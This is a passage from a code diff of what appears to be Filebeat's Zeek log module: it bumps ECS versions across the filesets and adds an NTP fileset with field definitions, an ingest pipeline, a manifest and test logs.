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" } diff --git a/x-pack/filebeat/module/zeek/files/config/files.yml b/x-pack/filebeat/module/zeek/files/config/files.yml index 19dfddb9bf5..ece8368600e 100644 --- a/x-pack/filebeat/module/zeek/files/config/files.yml +++ b/x-pack/filebeat/module/zeek/files/config/files.yml @@ -42,4 +42,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml index 6acba2ed0c8..8af9f478f8f 100644 --- a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml +++ b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/http/config/http.yml b/x-pack/filebeat/module/zeek/http/config/http.yml index 25bdbf709d1..7d94572208c 100644 --- a/x-pack/filebeat/module/zeek/http/config/http.yml +++ b/x-pack/filebeat/module/zeek/http/config/http.yml @@ -94,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json index 0b101cda6e1..df304170733 100644 --- a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json @@ -59,6 +59,7 @@ "url.username": "user", "user.name": "user", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "com.apple.trustd/2.0", "zeek.http.resp_fuids": [ @@ -127,6 +128,7 @@ "url.original": "/ip", "url.port": 80, "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0", diff --git a/x-pack/filebeat/module/zeek/intel/config/intel.yml b/x-pack/filebeat/module/zeek/intel/config/intel.yml index d48dec70d0e..4a40bd9da5f 100644 --- a/x-pack/filebeat/module/zeek/intel/config/intel.yml +++ b/x-pack/filebeat/module/zeek/intel/config/intel.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/irc/config/irc.yml b/x-pack/filebeat/module/zeek/irc/config/irc.yml index 58e1d861b13..0f98977aa91 100644 --- a/x-pack/filebeat/module/zeek/irc/config/irc.yml +++ b/x-pack/filebeat/module/zeek/irc/config/irc.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml index 6035aa9fba2..4cdcb14dbb5 100644 --- a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml +++ b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml index 759dfc78536..5f17276db41 100644 --- a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml +++ b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml index b3f5d82d489..fedacd63dec 100644 --- a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml +++ b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/notice/config/notice.yml b/x-pack/filebeat/module/zeek/notice/config/notice.yml index 4b09b7bc41f..cd840bd2fed 100644 --- a/x-pack/filebeat/module/zeek/notice/config/notice.yml +++ b/x-pack/filebeat/module/zeek/notice/config/notice.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml index bcdf04d899f..3d35ec38bb4 100644 --- a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml +++ b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ntp/_meta/fields.yml b/x-pack/filebeat/module/zeek/ntp/_meta/fields.yml new file mode 100644 index 00000000000..b48dcc20723 --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/_meta/fields.yml @@ -0,0 +1,63 @@ +- name: ntp + type: group + default_field: false + description: > + Fields exported by the Zeek NTP log. + fields: + - name: version + type: integer + description: > + The NTP version number (1, 2, 3, 4). + - name: mode + type: integer + description: > + The NTP mode being used. + - name: stratum + type: integer + description: > + The stratum (primary server, secondary server, etc.). + - name: poll + type: double + description: > + The maximum interval between successive messages in seconds. + - name: precision + type: double + description: > + The precision of the system clock in seconds. + - name: root_delay + type: double + description: > + Total round-trip delay to the reference clock in seconds. + - name: root_disp + type: double + description: > + Total dispersion to the reference clock in seconds. + - name: ref_id + type: keyword + description: > + For stratum 0, 4 character string used for debugging. + For stratum 1, ID assigned to the reference clock by IANA. + Above stratum 1, when using IPv4, the IP address of the reference clock. + Note that the NTP protocol did not originally specify a large enough field to represent IPv6 addresses, + so they use the first four bytes of the MD5 hash of the reference clock’s IPv6 address + (i.e. an IPv4 address here is not necessarily IPv4). + - name: ref_time + type: date + description: > + Time when the system clock was last set or correct. + - name: org_time + type: date + description: > + Time at the client when the request departed for the NTP server. + - name: rec_time + type: date + description: > + Time at the server when the request arrived from the NTP client. + - name: xmt_time + type: date + description: > + Time at the server when the response departed for the NTP client. + - name: num_exts + type: integer + description: > + Number of extension fields (which are not currently parsed). diff --git a/x-pack/filebeat/module/zeek/ntp/config/ntp.yml b/x-pack/filebeat/module/zeek/ntp/config/ntp.yml new file mode 100644 index 00000000000..83d43fd686f --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/config/ntp.yml @@ -0,0 +1,57 @@ +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - rename: + fields: + - {from: message, to: event.original} + - decode_json_fields: + fields: [event.original] + target: zeek.ntp + - convert: + ignore_missing: true + fields: + - {from: zeek.ntp.id.orig_h, to: source.address} + - {from: zeek.ntp.id.orig_h, to: source.ip, type: ip} + - {from: zeek.ntp.id.orig_p, to: source.port, type: long} + - {from: zeek.ntp.id.resp_h, to: destination.address} + - {from: zeek.ntp.id.resp_h, to: destination.ip, type: ip} + - {from: zeek.ntp.id.resp_p, to: destination.port, type: long} + - rename: + ignore_missing: true + fields: + - from: zeek.ntp.uid + to: zeek.session_id + - drop_fields: + ignore_missing: true + fields: + - zeek.ntp.id.orig_h + - zeek.ntp.id.orig_p + - zeek.ntp.id.resp_h + - zeek.ntp.id.resp_p + - add_fields: + target: event + fields: + kind: event + category: + - network + type: + - connection + - protocol + - info + - add_fields: + target: network + fields: + protocol: ntp + transport: udp + - community_id: + - add_fields: + target: '' + fields: + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ntp/ingest/pipeline.yml b/x-pack/filebeat/module/zeek/ntp/ingest/pipeline.yml new file mode 100644 index 00000000000..ed603292a3d --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/ingest/pipeline.yml @@ -0,0 +1,150 @@ +description: Pipeline for normalizing Zeek ntp.log +processors: + - set: + field: event.ingested + value: '{{_ingest.timestamp}}' + - set: + field: event.created + value: '{{@timestamp}}' + - date: + field: zeek.ntp.ts + formats: + - UNIX + - remove: + field: zeek.ntp.ts + # IP Geolocation Lookup + - geoip: + if: ctx.source?.geo == null + field: source.ip + target_field: source.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + - geoip: + if: ctx.destination?.geo == null + field: destination.ip + target_field: destination.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + # IP Autonomous System (AS) Lookup + - geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true + - rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true + - append: + field: "related.ip" + value: "{{source.ip}}" + if: "ctx?.source?.ip != null" + - append: + field: "related.ip" + value: "{{destination.ip}}" + if: "ctx?.destination?.ip != null" + - date: + field: zeek.ntp.ref_time + target_field: zeek.ntp.ref_time + formats: + - UNIX + - date: + field: zeek.ntp.org_time + target_field: zeek.ntp.org_time + formats: + - UNIX + - date: + field: zeek.ntp.rec_time + target_field: zeek.ntp.rec_time + formats: + - UNIX + - date: + field: zeek.ntp.xmt_time + target_field: zeek.ntp.xmt_time + formats: + - UNIX + - convert: + ignore_missing: true + field: zeek.ntp.version + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.mode + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.stratum + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.num_exts + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.poll + type: double + - convert: + ignore_missing: true + field: zeek.ntp.precision + type: double + - convert: + ignore_missing: true + field: zeek.ntp.root_delay + type: double + - convert: + ignore_missing: true + field: zeek.ntp.root_disp + type: double + - convert: + ignore_missing: true + field: zeek.ntp.ref_id + type: string + - set: + field: network.type + value: ipv4 + if: ctx.source?.ip.contains('.') + - set: + field: network.type + value: ipv6 + if: ctx.source?.ip.contains(':') +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/zeek/ntp/manifest.yml b/x-pack/filebeat/module/zeek/ntp/manifest.yml new file mode 100644 index 00000000000..034861b73fe --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/manifest.yml @@ -0,0 +1,19 @@ +module_version: 1.0 + +var: + - name: paths + default: + - /var/log/bro/current/ntp.log + os.linux: + - /var/log/bro/current/ntp.log + os.darwin: + - /usr/local/var/logs/current/ntp.log + - name: tags + default: [zeek.ntp] + +ingest_pipeline: ingest/pipeline.yml +input: config/ntp.yml + +requires.processors: +- name: geoip + plugin: ingest-geoip diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log new file mode 100644 index 00000000000..9799c888dba --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log @@ -0,0 +1,2 @@ +{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0} +{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0} diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json new file mode 100644 index 00000000000..940f548b1b7 --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json @@ -0,0 +1,126 @@ +[ + { + "@timestamp": "2020-10-08T00:29:07.977Z", + "destination.address": "208.79.89.249", + "destination.as.number": 25795, + "destination.as.organization.name": "ARP NETWORKS, INC.", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "208.79.89.249", + "destination.port": 123, + "event.category": [ + "network" + ], + "event.dataset": "zeek.ntp", + "event.kind": "event", + "event.module": "zeek", + "event.original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", + "event.type": [ + "connection", + "protocol", + "info" + ], + "fileset.name": "ntp", + "input.type": "log", + "log.offset": 0, + "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "network.protocol": "ntp", + "network.transport": "udp", + "network.type": "ipv4", + "related.ip": [ + "130.118.205.62", + "208.79.89.249" + ], + "service.type": "zeek", + "source.address": "130.118.205.62", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 37.751, + "source.geo.location.lon": -97.822, + "source.ip": "130.118.205.62", + "source.port": 38461, + "tags": [ + "zeek.ntp" + ], + "zeek.ntp.mode": 3, + "zeek.ntp.num_exts": 0, + "zeek.ntp.org_time": "1970-01-01T00:00:00.000Z", + "zeek.ntp.poll": 1.0, + "zeek.ntp.precision": 1.0, + "zeek.ntp.rec_time": "1970-01-01T00:00:00.000Z", + "zeek.ntp.ref_id": "\\x00\\x00\\x00\\x00", + "zeek.ntp.ref_time": "1970-01-01T00:00:00.000Z", + "zeek.ntp.root_delay": 0.0, + "zeek.ntp.root_disp": 0.0, + "zeek.ntp.stratum": 0, + "zeek.ntp.version": 4, + "zeek.ntp.xmt_time": "2020-10-08T00:29:07.215Z", + "zeek.session_id": "CqlPpF1AQVLMPgGiL5" + }, + { + "@timestamp": "2020-10-08T00:29:08.081Z", + "destination.address": "208.79.89.249", + "destination.as.number": 25795, + "destination.as.organization.name": "ARP NETWORKS, INC.", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "208.79.89.249", + "destination.port": 123, + "event.category": [ + "network" + ], + "event.dataset": "zeek.ntp", + "event.kind": "event", + "event.module": "zeek", + "event.original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", + "event.type": [ + "connection", + "protocol", + "info" + ], + "fileset.name": "ntp", + "input.type": "log", + "log.offset": 335, + "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "network.protocol": "ntp", + "network.transport": "udp", + "network.type": "ipv4", + "related.ip": [ + "130.118.205.62", + "208.79.89.249" + ], + "service.type": "zeek", + "source.address": "130.118.205.62", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 37.751, + "source.geo.location.lon": -97.822, + "source.ip": "130.118.205.62", + "source.port": 38461, + "tags": [ + "zeek.ntp" + ], + "zeek.ntp.mode": 4, + "zeek.ntp.num_exts": 0, + "zeek.ntp.org_time": "2020-10-08T00:29:07.215Z", + "zeek.ntp.poll": 8.0, + "zeek.ntp.precision": 5.960464477539063e-08, + "zeek.ntp.rec_time": "2020-10-08T00:29:07.964Z", + "zeek.ntp.ref_id": "127.67.113.92", + "zeek.ntp.ref_time": "2020-10-08T00:24:15.942Z", + "zeek.ntp.root_delay": 0.00921630859375, + "zeek.ntp.root_disp": 0.0212249755859375, + "zeek.ntp.stratum": 2, + "zeek.ntp.version": 4, + "zeek.ntp.xmt_time": "2020-10-08T00:29:07.964Z", + "zeek.session_id": "CqlPpF1AQVLMPgGiL5" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml index d929f70633f..d4b5bfd6e6a 100644 --- a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml +++ b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml @@ -64,4 +64,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/pe/config/pe.yml b/x-pack/filebeat/module/zeek/pe/config/pe.yml index 34b81b46117..1bb4e1ad2ec 100644 --- a/x-pack/filebeat/module/zeek/pe/config/pe.yml +++ b/x-pack/filebeat/module/zeek/pe/config/pe.yml @@ -33,4 +33,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/radius/config/radius.yml b/x-pack/filebeat/module/zeek/radius/config/radius.yml index 0779807c8fe..64498bc76e2 100644 --- a/x-pack/filebeat/module/zeek/radius/config/radius.yml +++ b/x-pack/filebeat/module/zeek/radius/config/radius.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml index f29a099da6b..ebc98d1709e 100644 --- a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml +++ b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml @@ -88,4 +88,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml index 0f974ac07d7..33d4ffd4b90 100644 --- 